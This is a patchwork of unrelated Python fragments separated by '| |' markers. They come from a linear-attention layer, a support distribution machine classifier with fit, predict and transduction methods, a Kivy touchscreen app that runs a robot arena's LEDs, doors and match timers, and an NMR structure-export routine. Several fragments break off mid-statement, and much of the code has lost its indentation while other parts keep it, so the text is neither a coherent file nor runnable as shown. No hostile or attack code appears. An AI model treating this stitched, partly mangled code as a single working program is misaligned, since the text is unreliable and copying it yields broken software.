self.feature_map = (
feature_map(query_dimensions) if feature_map else
elu_feature_map(query_dimensions)
)
self.eps = eps
# self.event_dispatcher = EventDispatcher.get(event_dispatcher)
def forward(self, queries, keys, values, attn_mask, query_lengths,
key_lengths):
# Apply the feature map to the queries and keys
self.feature_map.new_feature_map(queries.device)
Q = self.feature_map.forward_queries(queries)
K = self.feature_map.forward_keys(keys)
# Apply the key padding mask and make sure that the attn_mask is
# all_ones
if not attn_mask.all_ones:
raise RuntimeError(("LinearAttention does not support arbitrary "
"attention masks"))
K = K * key_lengths.float_matrix[:, :, None, None]
# Compute the KV matrix, namely the dot product of keys and values so
# that | |
save_bags=True):
self.div_func = div_func
self.K = K
self.tuning_folds = tuning_folds
self.n_proc = n_proc
self.sigma_vals = sigma_vals
self.scale_sigma = scale_sigma
self.weight_classes = weight_classes
self.cache_size = cache_size
self.tuning_cache_size = tuning_cache_size
self.svm_tol = svm_tol
self.tuning_svm_tol = tuning_svm_tol
self.svm_max_iter = svm_max_iter
self.tuning_svm_max_iter = tuning_svm_max_iter
self.svm_shrinking = svm_shrinking
self.status_fn = status_fn
self.progressbar = progressbar
self.min_dist = min_dist
self.symmetrize_divs = symmetrize_divs
self.km_method = km_method
self.transform_test = transform_test
self.save_bags = save_bags
classifier = False
regressor = False
oneclass = False
svm_class = property(_not_implemented)
tuning_loss = staticmethod(_not_implemented)
eval_score = staticmethod(_not_implemented)
score_name = property(_not_implemented)
score_fmt = property(_not_implemented)
    @property
    def status_fn(self):
        # Resolve the stored raw value (bool or callable) into a callable
        # via the module-level get_status_fn helper.
        return get_status_fn(self._status_fn)
    @status_fn.setter
    def status_fn(self, value):
        # Store the raw value; resolution happens lazily in the getter.
        self._status_fn = value
@property
def progressbar(self):
if self._progressbar is None:
return self._status_fn is True
else:
return self._progressbar
@progressbar.setter
def progressbar(self, value):
self._progressbar = value
def _div_args(self, for_cache=True):
d = {
'min_dist': self.min_dist,
'status_fn': self._status_fn,
'progressbar': self.progressbar,
}
if for_cache:
d.update({
'div_func': self.div_func,
'K': self.K,
'n_proc': self.n_proc,
})
else:
d.update({
'specs': [self.div_func],
'Ks': [self.K],
'cores': self.n_proc,
})
return d
def clear_fit(self):
for attr_name in dir(self):
if attr_name.endswith('_') and not attr_name.startswith('_'):
delattr(self, attr_name)
_fit_docstr = '''
Tunes parameters and then fits an SVM using the final parameters
on training data.
X should be one of:
- an sdm.Features instance (preferred)
- a list of row-instance data matrices each (num_pts x dim),
where num_pts can vary but dim needs to be constant
- None, if save_bags is False and you're passing divs. In this case,
you need to compute divergences for any test points yourself.
{y_doc}
sample_weight (optional): a vector of weights applied to each sample,
where 1 means unweighted.
divs (optional): precomputed divergences among the passed points
(an array of shape num_bags x num_bags)
divs_cache (optional): a filename for a cache file. Note that this
needs to be on the TRAINING data only, in the same order. Any names
or categories in X are used to verify the cache file is for the
right data.
ret_km (optional, boolean): if True, returns the final training kernel
matrix.
'''
    def fit(self, X, y, sample_weight=None, divs=None, divs_cache=None,
            ret_km=False):
        # (Docstring is assigned from _fit_docstr right after this def.)
        # --- Determine n_bags from X and/or validate precomputed divs.
        if X is None:
            if divs is None:
                raise ValueError("need to pass either X or divs to fit()")
            if self.save_bags:
                msg = "Need to pass data to fit() if save_bags is true."
                raise ValueError(msg)
            n_bags = None
        else:
            n_bags = len(X)
        if divs is not None:
            divs = np.asarray(divs)
            if divs.ndim != 2:
                raise ValueError("divs should be n_bags x n_bags")
            a, b = divs.shape
            if a != b:
                raise ValueError("divs should be n_bags x n_bags")
            if n_bags is None:
                n_bags = a
            elif a != n_bags:
                raise ValueError("divs should be n_bags x n_bags")
        y = np.squeeze(y)
        if y.shape != (n_bags,):
            raise ValueError("y should be 1d of length n_bags")
        # --- Semi-supervised labels: -1 (classifier) / NaN (regressor)
        # mark unlabeled bags that participate in the kernel but not in
        # SVM training.
        if self.classifier:
            if not is_categorical_type(y) or np.any(y < -1):
                raise ValueError("y for classification should be ints >= -1")
            train_idx = y != -1
        else:
            train_idx = ~np.isnan(y)
        if sample_weight is None:
            train_sample_weight = None
        else:
            sample_weight = np.asarray(sample_weight)
            train_sample_weight = sample_weight[train_idx]
        train_y = y[train_idx]
        if train_y.size < 2:
            raise ValueError("must train with at least 2 points")
        if not self.oneclass and np.all(train_y == train_y[0]):
            raise ValueError("can't train with only one class")
        if (self.save_bags or divs is None) and not isinstance(X, Features):
            X = Features(X)
        if self.save_bags:
            # Keep only the labeled bags for later inductive prediction.
            self.train_bags_ = X[train_idx]
        # get divergences (possibly via the on-disk cache)
        if divs is None:
            self.status_fn('Getting divergences...')
            div_args = self._div_args(for_cache=True)
            divs = get_divs_cache(X, cache_filename=divs_cache, **div_args)
        if self.symmetrize_divs:
            divs = symmetrize(divs)
        # tune params on the labeled (training) sub-matrix only
        self.status_fn('Tuning SVM parameters...')
        self._tune_params(
            divs=np.ascontiguousarray(divs[np.ix_(train_idx, train_idx)]),
            labels=train_y, sample_weight=train_sample_weight)
        # project the final Gram matrix (PSD projection per km_method)
        self.status_fn('Doing final projection')
        fn = partial(make_km, divs, self.sigma_, method=self.km_method)
        if self.transform_test:
            # Also keep the transformer so test kernels get the same projection.
            full_km, self.test_transformer_ = fn(ret_test_transformer=True)
        else:
            full_km = fn()
        train_km = np.ascontiguousarray(full_km[np.ix_(train_idx, train_idx)])
        # train the selected SVM with the tuned parameters
        self.status_fn('Training final SVM')
        params = self._svm_params(tuning=False)
        clf = self.svm_class(**params)
        if self.oneclass:
            clf.fit(train_km, sample_weight=train_sample_weight)
        else:
            clf.fit(train_km, train_y, sample_weight=train_sample_weight)
        self.svm_ = clf
        if ret_km:
            return full_km
    fit.__doc__ = _fit_docstr.format(y_doc="""
    y: a vector of class labels (depending on the subclass)
    """)
def _prediction_km(self, data=None, divs=None, km=None):
# TODO: smarter projection options for inductive use
if getattr(self, 'svm_', None) is None:
raise ValueError("SDM: need to fit before you can predict!")
if km is not None:
return km
if divs is not None:
destroy_divs = False
else:
if not self.save_bags:
raise ValueError("SDM that doesn't save_bags can't predict "
"without explicit divs")
n_train = len(self.train_bags_)
n_test = len(data)
self.status_fn('Getting test bag divergences...')
mask = np.zeros((n_train + n_test, n_train + n_test), dtype=bool)
mask[:n_train, -n_test:] = True
mask[-n_test:, :n_train] = True
divs = np.squeeze(estimate_divs(
self.train_bags_ + data, mask=mask,
**self._div_args(for_cache=False)))
divs = (divs[-n_test:, :n_train] + divs[:n_train, -n_test].T) / 2
destroy_divs = True
km = rbf_kernelize(divs, self.sigma_, destroy=destroy_divs)
if self.transform_test:
km = self.test_transformer_(km)
return km
def predict(self, data, divs=None, km=None):
km = self._prediction_km(data, divs=divs, km=km)
preds = self.svm_.predict(km)
if self.classifier:
assert np.all(preds == np.round(preds))
return preds.astype(int)
else:
return preds
def decision_function(self, data, divs=None, km=None):
km = self._prediction_km(data, divs=divs, km=km)
return self.svm_.decision_function(km)
def score(self, data, labels, divs=None, km=None):
preds = self.predict(data, divs=divs, km=km)
return self.eval_score(labels, preds)
def transduct(self, train_bags, train_labels, test_bags, divs=None,
train_weight=None, mode='predict', save_fit=False):
'''
Trains an SDM transductively, where the kernel matrix is constructed on
the training + test points, the SVM is trained on training points, and
predictions are done on the test points.
The SVM itself is inductive (given the kernel).
Arguments
---------
train_bags: a Features instance, list of row-instance data matrices,
or None. (If None, divs is required.)
train_labels: a label vector, like y for fit() except that the
"semi-supervised" label is not supported.
test_bags: a Features instance, list of row-instance data matrices,
or None. (If None, divs is required.)
divs (optional): a matrix of divergences of shape
(num_train + num_test, num_train + num_test), ordered with the
training bags first and then the test bags following.
Transparent caching is not yet supported here.
train_weight (optional): a vector of weights applied to each training
sample, where 1 means unweighted.
mode (default 'predict'): one of 'predict', 'dec', 'proba', 'log_proba'.
Returns the results of predict(), decision_function(),
predict_proba(), or predict_log_proba(), depending on this argument.
The latter two only work for classifiers.
save_fit (boolean, default false): By default, the SDM object does not
save its fit and is reset to an un-fit state as if it had just been
constructed. Passing save_fit=True makes the fit persistent.
'''
# TODO: support transparent divs caching by passing in indices
# TODO: support passing in pre-stacked train/test features,
# for minimal stacking purposes
train_labels = np.squeeze(train_labels)
if train_labels.ndim != 1:
raise TypeError("train_labels should be 1d")
n_train = train_labels.shape[0]
pred_fns = {'predict': self.predict, 'dec': self.decision_function}
if self.classifier:
pred_fns['proba'] = self.predict_proba
pred_fns['log_proba'] = self.predict_log_proba
if mode not in pred_fns:
raise ValueError("unknown transduction mode '{}'".format(mode))
pred_fn = pred_fns[mode]
if self.classifier:
if not is_categorical_type(train_labels) or train_labels.min() < 0:
raise TypeError("train_labels should be nonnegative integers")
else:
if not np.all(np.isfinite(train_labels)):
raise TypeError("train_labels should be finite")
if divs is not None:
divs = np.asarray(divs)
if divs.ndim != 2:
raise TypeError("divs should be 2d")
n_both, b = divs.shape
if n_both != b:
raise TypeError("divs should be n_bags x n_bags")
n_test = n_both - n_train
if n_test < 1:
raise TypeError("divs should have length num_train + num_test")
combo_bags = None
else:
if train_bags is None or test_bags is None:
raise TypeError("must pass either divs or train_bags/test_bags")
if len(train_bags) != n_train:
raise TypeError("train_bags and train_labels should have "
"consistent lengths")
n_test = len(test_bags)
if divs is None or (save_fit and self.save_bags):
if train_bags is None or test_bags is None:
raise TypeError("must pass bags if save_fit and save_bags")
combo_bags = train_bags + test_bags
if not isinstance(combo_bags, Features):
combo_bags = Features(combo_bags)
if not save_fit:
old_save_bags = self.save_bags
self.save_bags = False # avoid keeping copies around
# make fake labels for test data, so fit() knows what they are
test_fake_labels = np.empty(n_test, dtype=train_labels.dtype)
test_fake_labels.fill(-1 if self.classifier else np.nan)
combo_labels = np.hstack((train_labels, test_fake_labels))
if train_weight is not None:
train_weight = np.r_[train_weight, np.zeros(n_test)]
full_km = BaseSDM.fit(self, X=combo_bags, y=combo_labels, divs=divs,
sample_weight=train_weight, ret_km=True)
preds = pred_fn(test_bags, km=full_km[-n_test:, :n_train])
| |
from kivy.config import Config
Config.read("BattleBox.ini")
from kivy.app import App
from kivy.animation import Animation
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.uix.widget import Widget
from kivy.uix.textinput import TextInput
from kivy.uix.dropdown import DropDown
from kivy.uix.button import Button
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.uix.gridlayout import GridLayout
from kivy.uix.screenmanager import ScreenManager, Screen, FadeTransition
from kivy.properties import ListProperty, ObjectProperty, StringProperty, BoundedNumericProperty, NumericProperty, BooleanProperty
from BattleBox.data import BBViewModelProp, BBDeathMatchProp, BBSoccerMatchProp, BBRunDeathMatchProp
from BattleBox.arena import HardwareInterface
from kivy.core.window import Window
from kivy.logger import Logger
from math import floor
import platform, re, random
from datetime import datetime
import time
from functools import partial
import subprocess as subp
import asyncio
from ipc.communicator import InstructionServer
from ipc.message import *
import json
random.seed(datetime.now())
# Coloring = Red->Green->Blue
# Named (R, G, B) tuples, 0-255 per channel, for the arena LED strip.
RED = (255, 0, 0)
MATCH_COUNT_DOWN_RED = RED
YELLOW = (255, 255, 0)
DD_YELLOW = (200, 255, 0)  # dd = door drop
GREEN = (0, 255, 0)
SOCCER_GREEN = (0, 255, 68)
ORANGE = (255, 68, 0)
PURPLE = (93, 0, 255)
WHITE = (255, 255, 255)
BLUE = (0, 0, 255)
PINK = (255, 0, 149)
DOOR_NOT_CLOSED_WARNING_COLOR = (255, 174, 0)
PLAYER_2_COLOR = (0, 110, 255)
PLAYER_1_COLOR = RED
STOP_LIGHT_RED = (184, 29, 19)
STOP_LIGHT_ORANGE = (218, 83, 10)
STOP_LIGHT_YELLOW = (239, 183, 0)
STOP_LIGHT_GREEN = (0, 255, 0)
# Step size used by the brightness "breathing" animations.
BrightnessPerMillis = 1/30
class MainScreen(Screen):
    """Landing screen; idles with a white "breathing" LED animation."""
    # Current LED brightness; animated between 10 and 255 while on screen.
    lights_brightness = NumericProperty(0)
    def __init__(self, **kwargs):
        super(MainScreen, self).__init__(**kwargs)
        # NOTE(review): self.Breath appears unused — breath_anim drives the
        # animation; confirm before removing.
        self.Breath = None
    def on_enter(self):
        # Dim to white, then loop a brightness "breathing" animation.
        App.get_running_app().arena.led_brightness_and_fill(10, *WHITE)
        self.lights_brightness = 10
        self.breath_anim = (Animation(lights_brightness=255,
            s=BrightnessPerMillis, duration=1.0, t="linear") +
            Animation(lights_brightness=10, s=BrightnessPerMillis,
            duration=1.0, t="linear"))
        self.breath_anim.repeat = True
        self.breath_anim.start(self)
    def on_lights_brightness(self, instance, value):
        # Push each animated brightness step to the arena hardware.
        App.get_running_app().arena.led_brightness(floor(value))
    def on_pre_leave(self):
        # Stop the breathing loop and restore full brightness.
        Animation.cancel_all(self)
        App.get_running_app().arena.led_brightness(255)
class UIntInput(TextInput):
    """TextInput that only ever holds an unsigned decimal integer."""
    pat = re.compile('[^0-9]*')

    def insert_text(self, substring, from_undo=False):
        # Strip every non-digit character before handing off to TextInput.
        digits_only = re.sub(self.pat, '', substring)
        return super(UIntInput, self).insert_text(digits_only,
                                                  from_undo=from_undo)

    def on_text(self, instance, value):
        '''Keep the field non-empty: an emptied field snaps back to "0" so
        callers can always parse the text as an int.
        '''
        if not value:
            self.text = "0"
class DeathmatchScreen(Screen):
    """Death-match configuration screen (player names, durations, door
    drop mode); validates the settings and hands off to a wait screen."""
    # Bound in kv to the death-match view-model.
    data = ObjectProperty(None)
    lights_brightness = NumericProperty()
    def __init__(self, **kwargs):
        super(DeathmatchScreen, self).__init__(**kwargs)
    def reset_screen(self, app):
        """Clear the per-match fields before the screen is reused."""
        # app.data.death_match.reset()
        app.data.death_match.player_one_name = ""
        app.data.death_match.player_two_name = ""
        self.ids.dm_door_drop.do_update_main_button(app.data.death_match.door_drop)
    def on_enter(self):
        # Breathing red LEDs while configuring a death match.
        App.get_running_app().arena.led_brightness_and_fill(10, 255, 0, 0)
        self.lights_brightness = 10
        self.breath_anim = (Animation(lights_brightness=255,
            s=BrightnessPerMillis, duration=1.0, t="linear") +
            Animation(lights_brightness=10, s=BrightnessPerMillis,
            duration=1.0, t="linear"))
        self.breath_anim.repeat = True
        self.breath_anim.start(self)
    def on_lights_brightness(self, instance, value):
        App.get_running_app().arena.led_brightness(floor(value))
    def on_pre_leave(self):
        Animation.cancel_all(self)
        App.get_running_app().arena.led_brightness(255)
    def drop_down_changed(self, instance, x):
        # The door-drop duration input only matters when some door will
        # actually drop; unknown values leave the input untouched.
        if x in ('Never drop doors', 'Doors Always Open'):
            self.ids.dm_door_drop_duration.disabled = True
        elif x in ('Drop Both', 'Drop Player 1 Door Only',
                   'Drop Player 2 Door Only', 'Drop Random Door'):
            self.ids.dm_door_drop_duration.disabled = False
    def on_battle_validation(self, app, root):
        """Validate the configuration; on success switch to the proper
        wait screen (with or without the doors-closed check)."""
        if self.data.duration == 0:
            create_popup("death match", "Match duration cannot be zero")
            return
        if not self.ids.dm_door_drop_duration.disabled:
            if self.data.door_drop_duration == 0:
                create_popup("death match", "Door drop duration cannot be zero.\n\nIf you want them open all of the time please select that option from the drop down.")
                return
            if self.data.door_drop_duration >= self.data.duration:
                create_popup("death match", "Door drop duration must be less then the match duration.")
                return
        # BUG FIX: str.strip() returns a new string; the original discarded
        # the result, so surrounding whitespace was never removed.
        self.data.player_one_name = self.data.player_one_name.strip()
        if self.data.player_one_name != "":
            if len(self.data.player_one_name) >= 20:
                create_popup("death match", "Player one's name must be less then 20 charactres")
                return
        self.data.player_two_name = self.data.player_two_name.strip()
        if self.data.player_two_name != "":
            if len(self.data.player_two_name) >= 20:
                create_popup("death match", "Player two's name must be less then 20 charactres")
                return
        if self.data.player_one_name != "" and self.data.player_two_name != "":
            if self.data.player_one_name == self.data.player_two_name:
                create_popup("death match", "Players one and two cannot both have the same names")
                return
        # If the doors never drop we only need the players ready; otherwise
        # also wait for the doors to be closed before we begin.
        if self.ids.dm_door_drop_duration.disabled:
            temp = app.root.get_screen('WaitForPlayers')
            temp.reset_screen("RunDeathmatch", "Player", self.name, "FIGHT!!!")
            app.root.current = 'WaitForPlayers'
            root.manager.transition.direction = 'left'
            return
        temp = app.root.get_screen('WaitForPlayersAndDoors')
        temp.reset_screen("RunDeathmatch", "Player", self.name, "FIGHT!!!")
        app.root.current = 'WaitForPlayersAndDoors'
        root.manager.transition.direction = 'left'
class CountDownTrigger:
    '''Bookkeeping for an LED count-down window.  All runtimes given in
    seconds.  A trigger covers the window [stop_time, start_time] of the
    match clock (which counts down), lighting LEDs as time elapses.'''
    def __init__(self):
        self.stop_time = 0
        self.start_time = 0
        self.increment = 0
        self.time_increment_elapsed = 0
        self.is_active = False
        self.did_complete = False
        self.light_color = None
        # Kept in sync with light_color (see reset()).
        self.color = None
        self.on_complete = None
        self.number_of_lights_on = 0
    def duration(self):
        """Length of the count-down window in seconds."""
        return self.start_time - self.stop_time
    def reset(self, completionTime, runDuration, lightCount, matchDuration, color, on_complete):
        """Re-arm the trigger to finish at ``completionTime`` after running
        for ``runDuration`` seconds, clamped to the match duration."""
        self.is_active = False
        self.did_complete = False
        self.stop_time = completionTime
        self.start_time = completionTime + runDuration
        # Clamp: the window cannot start before the match does.
        if self.start_time > matchDuration:
            self.start_time = matchDuration
        self.number_of_lights_on = 0
        self.time_increment_elapsed = 0
        # BUG FIX: reset() previously set only ``self.color`` while
        # __init__()/dump() used ``self.light_color``; keep both in sync so
        # dump() reports the real color.
        self.color = color
        self.light_color = color
        self.on_complete = on_complete
    def dump(self, name):
        """Print the trigger state for debugging."""
        print("Stats for", name)
        print("self.stop_time", self.stop_time)
        print("self.start_time", self.start_time)
        print("self.increment", self.increment)
        print("self.time_increment_elapsed", self.time_increment_elapsed)
        print("self.is_active", self.is_active)
        print("self.did_complete", self.did_complete)
        print("self.light_color", self.light_color)
        print("self.on_complete", self.on_complete)
        print("self.number_of_lights_on", self.number_of_lights_on)
    def does_overlap(self, other):
        # NOTE(review): the second term compares other.stop_time against
        # self.start_time, never other.start_time — verify this is the
        # intended interval-overlap test.
        return self.stop_time > other.stop_time and other.stop_time < self.start_time
class SelectADeathMatchWinnerScreen(Screen):
    """Winner-selection screen; behavior is defined entirely in the kv file."""
    pass
class RunDeathmatchScreen(Screen):
    """Live death-match screen: drives the count-down clock, the LED
    count-down bars, and the (optional) timed door drop."""
    data = ObjectProperty(None)
    dmData = ObjectProperty(None)
    # cd = count down
    cd_lights_on = NumericProperty(0)
    match_over_lights = NumericProperty(0)
    # Used to trigger the dropping of the doors
    doors_closed = BooleanProperty(False)
    def __init__(self, **kwargs):
        self.register_event_type("on_drop_doors")
        super(RunDeathmatchScreen, self).__init__(**kwargs)
        self.match_over_trigger = CountDownTrigger()
        self.door_drop_trigger = CountDownTrigger()
        self.will_drop_doors = False
        self.match_over_active = False
        self.cd_animation = None
        self.ddColor = DD_YELLOW
        # NOTE(review): "olver" looks like a typo for "over"; the name is
        # only used inside this class.
        self.match_olver_color = MATCH_COUNT_DOWN_RED
    def _do_reset(self, app, root, deltaTime):
        # Clock.schedule_once callback: actually start the count-down clock.
        self.ids.countDownClock.start(self.dmData.duration)
        Logger.info("MainApp->RunDeathMatchScreen->_do_reset: Completed screen reset")
        return False
    def reset_screen(self, app, root):
        # Sending command to start countdown
        Logger.info("MainApp->RunDeathMatchScreen->reset_screen: Scheduling reset")
        self.will_drop_doors = False
        # The last 30 seconds of the match are counted down on the LED bar.
        self.match_over_trigger.reset(0, 30,
            App.get_running_app().get_led_count(),
            self.dmData.duration,
            self.match_olver_color,
            self.on_complete_match_count_down)
        if self.dmData.door_drop == 'Drop Both':
            self.will_drop_doors = True
        elif self.dmData.door_drop == 'Never drop doors':
            self.will_drop_doors = False
        elif self.dmData.door_drop == 'Doors Always Open':
            self.will_drop_doors = False
            # presumably the argument is an open delay/duration in seconds
            # — TODO confirm against HardwareInterface.
            App.get_running_app().open_player_1_door(3)
            App.get_running_app().open_player_2_door(3)
        elif self.dmData.door_drop == 'Drop Player 1 Door Only':
            self.will_drop_doors = True
        elif self.dmData.door_drop == 'Drop Player 2 Door Only':
            self.will_drop_doors = True
        elif self.dmData.door_drop == 'Drop Random Door':
            self.will_drop_doors = True
        else:
            print("Value for door drop = ", self.dmData.door_drop)
        if self.will_drop_doors:
            # 15-second LED count-down leading up to the door drop.
            self.door_drop_trigger.reset(self. dmData.door_drop_duration,
                15, App.get_running_app().get_led_count(), self.dmData.duration,
                DD_YELLOW, self.on_completed_door_drop_count_down)
        # Start 300 ms in the future so the hardware command and the UI
        # clock (scheduled below with the same delay) line up.
        self.match_start_time = round(time.time() * 1000) + 300
        app.send_run_deathmatch_cmd(self.match_start_time, self.dmData.duration, self.will_drop_doors,
            self.door_drop_trigger.start_time, self.door_drop_trigger.stop_time)
        Clock.schedule_once(partial(self._do_reset, app, root), 0.3)
    def on_completed_door_drop_count_down(self):
        print("COmpleted door drop count down")
    def on_complete_match_count_down(self):
        print("Complete match count down")
    def cancel_count_downs(self):
        Animation.cancel_all(self)
    def on_seconds(self, instance, value):
        # Clock tick handler: lazily starts each LED-bar animation once the
        # remaining time drops into that trigger's window.
        if self.will_drop_doors:
            if not self.door_drop_trigger.is_active:
                if value <= self.door_drop_trigger.start_time:
                    self.cd_lights_on = 0
                    self.prevTick = -1
                    self.cd_animation = Animation(cd_lights_on=int(App.get_running_app().get_led_count())-1,
                        duration=self.door_drop_trigger.duration(),
                        t="linear")
                    self.cd_animation.bind(on_complete=self.on_dd_complete)
                    self.door_drop_trigger.is_active = True
                    self.cd_animation.start(self)
                    self.ddColor = self.door_drop_trigger.color
        if not self.match_over_trigger.is_active:
            if value <= self.match_over_trigger.start_time:
                self.match_over_trigger.is_active = True
                self.match_over_prev_tick = -1
                self.match_over_lights = 0
                self.match_over_animation = Animation(match_over_lights=int(App.get_running_app().get_led_count())-1,
                    duration=self.match_over_trigger.duration(),
                    t="linear")
                self.match_over_animation.bind(on_complete=self.on_match_complete)
                self.match_over_animation.start(self)
    def on_dd_complete(self, animation, value):
        # Door-drop count-down finished: drop the doors, flash full white.
        App.get_running_app().do_door_drop()
        App.get_running_app().arena.led_brightness_and_fill(255, 255, 255, 255)
    def on_cd_lights_on(self, instance, value):
        # Light LEDs one at a time as the animated float crosses integers.
        if self.prevTick == -1:
            self.prevTick = floor(value)
            App.get_running_app().arena.set_led(self.prevTick, *self.ddColor)
        elif self.prevTick != floor(value):
            self.prevTick = int(floor(value))
            App.get_running_app().arena.set_led(self.prevTick, *self.ddColor)
    def on_match_complete(self, animation, value):
        print("Match over!")
    def on_match_over_lights(self, instance, value):
        # Same one-LED-at-a-time pattern for the end-of-match count-down.
        if self.match_over_prev_tick == -1:
            self.match_over_prev_tick = floor(value)
            App.get_running_app().arena.set_led(self.match_over_prev_tick,
                *self.match_over_trigger.color)
        elif self.match_over_prev_tick != floor(value):
            self.match_over_prev_tick = int(floor(value))
            App.get_running_app().arena.set_led(self.match_over_prev_tick,
                *self.match_over_trigger.color)
    def on_data(self, instance, value):
        pass
    def on_drop_doors(self):
        pass
    def on_pre_enter(self):
        pass
    def on_leave(self):
        pass
class ErrorMessagePopUp(Popup):
    """Modal popup showing a validation error; layout lives in the kv file."""
    # The error text rendered by the popup body.
    message = StringProperty("")
    def __init__(self, **kwargs):
        super(ErrorMessagePopUp, self).__init__(**kwargs)
def create_popup(screenName, msg):
    """Open a fixed-size, non-dismissable error popup for ``screenName``."""
    popup = ErrorMessagePopUp(title='Invalid {0} configuration'.format(screenName),
                              message=msg,
                              size_hint=(None, None), size=(400, 400),
                              auto_dismiss=False)
    popup.open()
class SoccerScreen(Screen):
    """Soccer-match configuration screen (team names, duration, points)."""
    data = ObjectProperty(None)
    lights_brightness = NumericProperty()
    def __init__(self, **kwargs):
        super(SoccerScreen, self).__init__(**kwargs)
    def on_enter(self):
        # Breathing green LEDs while configuring a soccer match.
        App.get_running_app().arena.led_brightness_and_fill(10, *SOCCER_GREEN)
        self.lights_brightness = 10
        self.breath_anim = (Animation(lights_brightness=255,
            s=BrightnessPerMillis, duration=1.0, t="linear") +
            Animation(lights_brightness=10, s=BrightnessPerMillis,
            duration=1.0, t="linear"))
        self.breath_anim.repeat = True
        self.breath_anim.start(self)
    def on_lights_brightness(self, instance, value):
        App.get_running_app().arena.led_brightness(floor(value))
    def on_pre_leave(self):
        Animation.cancel_all(self)
        App.get_running_app().arena.led_brightness(255)
    def reset_screen(self, app):
        """Clear the per-match fields before the screen is reused."""
        # app.data.soccer_match.reset()
        app.data.soccer_match.team_one_name = ""
        app.data.soccer_match.team_two_name = ""
    def on_match_validation(self, app, root):
        """Validate the configuration; on success reset the live scores and
        move to the wait-for-players screen."""
        if self.data.duration == 0:
            create_popup("soccer match", "Match duration cannot be zero")
            return
        if self.data.points == 0:
            create_popup("soccer match", "Number of match points cannot be zero.")
            return
        # BUG FIX: str.strip() returns a new string; the original discarded
        # the result, so surrounding whitespace was never removed.
        self.data.team_one_name = self.data.team_one_name.strip()
        if self.data.team_one_name != "":
            if len(self.data.team_one_name) >= 20:
                create_popup("soccermatch", "Player one's name must be less then 20 charactres")
                return
        self.data.team_two_name = self.data.team_two_name.strip()
        if self.data.team_two_name != "":
            if len(self.data.team_two_name) >= 20:
                create_popup("soccer match", "Player two's name must be less then 20 charactres")
                return
        if self.data.team_one_name != "" and self.data.team_two_name != "":
            if self.data.team_one_name == self.data.team_two_name:
                create_popup("soccer match", "teams one and two cannot both have the same names")
                return
        app.data.run_soccer_match.team_one_score = 0
        app.data.run_soccer_match.team_two_score = 0
        temp = app.root.get_screen('WaitForPlayers')
        temp.reset_screen("RunSoccer", "Team", self.name, "GO!!!")
        app.root.current = 'WaitForPlayers'
        root.manager.transition.direction = 'left'
class ManualSoccerScoreAdjustmentScreen(Screen):
    """Manual score-correction screen; behavior is defined in the kv file."""
    pass
class RunSoccerScreen(Screen):
data = ObjectProperty(None, allownone=False)
PauseGameStr = "Pause\nGame"
ResumeGameStr = "Resume\nGame"
pause_play_button_text = StringProperty("Pause\nGame")
cd_lights = NumericProperty()
    def __init__(self, **kwargs):
        # Custom event dispatched when a team reaches the configured
        # maximum score.
        self.register_event_type("on_max_score_reached")
        super(RunSoccerScreen, self).__init__(**kwargs)
    def on_pre_enter(self):
        # Soccer matches start with both doors open; the argument is
        # presumably an open delay/duration in seconds — TODO confirm.
        App.get_running_app().open_player_1_door(3)
        App.get_running_app().open_player_2_door(3)
    def on_data(self, instance, value):
        # NOTE(review): both score properties are bound to
        # on_team_one_scored — this looks like one shared "a goal was
        # scored" handler, but confirm team two was not meant to get its
        # own callback.
        self.data.bind(team_one_score=self.on_team_one_scored,
                       team_two_score=self.on_team_one_scored)
    def on_pause_play_button_text(self, instance, value):
        # Property observer required by Kivy; no extra behavior needed.
        pass
    def _do_resume(self, deltaTime):
        # Clock.schedule_once callback: restart the clock and flip the
        # button label back to "Pause".
        self.ids.countDownClock.resume()
        self.pause_play_button_text = RunSoccerScreen.PauseGameStr
    def play_pause_pressed(self):
        # Toggle pause/resume based on the current button label.
        if self.pause_play_button_text == RunSoccerScreen.PauseGameStr:
            self.ids.countDownClock.pause()
            App.get_running_app().send_pause_soccer_cmd(self.ids.countDownClock.seconds)
        else:
            # Resume 300 ms in the future so the hardware command and the
            # UI clock (scheduled below with the same delay) line up.
            match_start_time = round(time.time() * 1000) + 300
            App.get_running_app().send_resume_soccer_cmd(match_start_time, self.ids.countDownClock.seconds)
            Clock.schedule_once(self._do_resume, 0.3)
    def pause_count_down(self):
        # Stop any LED count-down animations running on this screen.
        Animation.cancel_all(self)
def _do_resume_count_down(self, duration, *Args):
| |
= pickler()
p.dump(spectrum, filename, gzip = 0)
self.debug('Time: %ss' % str(clock()-t))
self.message('Assigned spectrum "%s" written to file %s"' \
% (spectrum.getName(), filename))
    def _dump_ccpn(self, iteration, path, is_water_refinement=False):
        """Export this iteration's results back into the attached CCPN project.

        Depending on the reporter settings this exports structures (PDB
        files), NOE/distance restraint lists (including rejected/inactive
        ones) and peak assignments, and registers each piece of data as
        output of the CCPN NmrCalc "ARIA run" object.  No-op when the ARIA
        project has no CCPN project attached.
        """
        from aria.Singleton import ProjectSingleton
        project = ProjectSingleton()
        if project.ccpn_project_instance is None:
            return
        ## # BARDIAUX 2.3 : when solvent molec present, abort CCPN PDB export
        ## write_solvent = self.getSettings()['water_refinement']['write_solvent_molecules']
        ## if is_water_refinement and write_solvent == YES:
        ##     msg = 'CCPN export: Solvent refined structures contain solvent molecules.' + \
        ##           'PDB files will not be exported.'
        ##     self.warning(msg)
        ##     return
        # BARDIAUX 2.3
        try:
            import aria.exportToCcpn as ccpnExport
        except:
            self.warning('CCPNmr Analysis not found. CCPN export aborted.')
            return
        from aria.importFromCcpn import getKeysFromString
        project_settings = project.getSettings()
        run_name = project_settings['run'].strip().replace(' ', '_')
        file_root = project_settings['file_root'].strip().replace(' ', '_')
        ccpn_project = project.ccpn_project_instance
        nmrProject = ccpn_project.currentNmrProject or ccpn_project.findFirstNmrProject()
        ## TBD: proper handling of NMR projects, e.g. the case in which
        ## multiple NMR projects exist.
        if not nmrProject:
            self.message('CCPN export: No NMR project found, creating new one.')
            name = 'ARIA2_run_%s' % run_name
            nmrProject = ccpn_project.newNmrProject(name=name)
        s = project.getReporter()['ccpn']
        export = 0
        # TJS: Includes inactive ones as these are
        # now passed back to CCPN (and marked)
        restraints = iteration.getPeakList()
        # BARDIAUX: Update for multiple chains
        aria_chain = project.getMolecule().get_chains()[0]
        chains = ccpnExport.getChainsFromAria2(restraints, ccpn_project,
                                               aria_chain=aria_chain)
        # TJS: Get Run object for CCPN to group objects
        # If data comes from CCPN, this would have been made
        # in Extend-NMR GUI or at load time
        # NOTE(review): ask_water/is_last_iteration are only assigned inside
        # this branch but are read unconditionally below — if `chains` is
